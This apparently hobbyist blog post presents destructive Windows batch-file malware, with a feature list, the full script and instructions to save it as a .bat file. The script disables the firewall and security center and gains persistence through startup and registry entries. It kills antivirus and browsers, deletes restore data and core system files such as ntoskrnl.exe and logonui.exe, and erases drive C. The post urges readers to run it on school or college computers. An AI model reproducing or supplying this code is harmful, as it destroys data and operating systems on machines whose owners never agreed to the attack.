Verry very Dangerous Virus Program using Batch Programming
readers, here is another very very dangerous virus progrmming using
Batch programming. This is very very danger than the previous virus
code. So be careful than the before one.
Viruc will do:
*.Copy itself for multiple times.
*.This will disable the restore option by deleting the restore file.
*.This will disable the login option.
*.If this affect the system, then the user can't use his OS longer.
Viruc will do:
*.Copy itself for multiple times.
*.This will disable the restore option by deleting the restore file.
*.This will disable the login option.
*.If this affect the system, then the user can't use his OS longer.
start color 5 title Your Fucked, lol time 12:00 net stop "Security center" net stop sharedaccess netsh firewall set opmode mode-disable start echo copy %0 >> c:\autoexec.bat copy %0 c:\windows\startm~1\Programs\StartUp\shroom.bat Attrib +r +h C:\windows\startm~1\program\startup\shroom.bat echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c:\regstart.reg echo "systemStart"="c:\filename\virus.bat" >> c:\regstart.reg start c:\regstart.reg copy %0 %systemroot%\shroom.bat > nul start copy %0 *.bat > nul start attrib +r +h virus.bat attrib +r +h RUNDLL32 USER32.DLL,SwapMouseButton tskill msnmsgr tskill Limewire tskill iexplorer tskill NMain tskill Firefox tskill explorer tskill AVGUARD msg * Awww Your computer is now fucked msg * You got owned! msg * Say Bye to your computer n00b copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS del "C:\WINDOWS\pchealth\" del "C:\WINDOWS\system\" del "C:\WINDOWS\system32\restore\" del "C:\WINDOWS\system32\logonui.exe" del "C:\WINDOWS\system32\ntoskrnl.exe" del "Winlogon.exe" ERASE c: start shutdown - s -t 15 -c "15 Seconds and counting" cd %userprofile%\Desktop copy fixvirus.bat %userprofile%\Desktop echo HAXHAXHAX :LOOP color 17 color 28 color 32 color 22 color 11 color 02 color 39 color 34 GOTO LOOP
Copy this code into notepad and save as name.bat(while saving select all files instead of text files)
This is dangerous virus. So Handle it with careful. Don't try in your pc or friend pc. Just try in your school or college.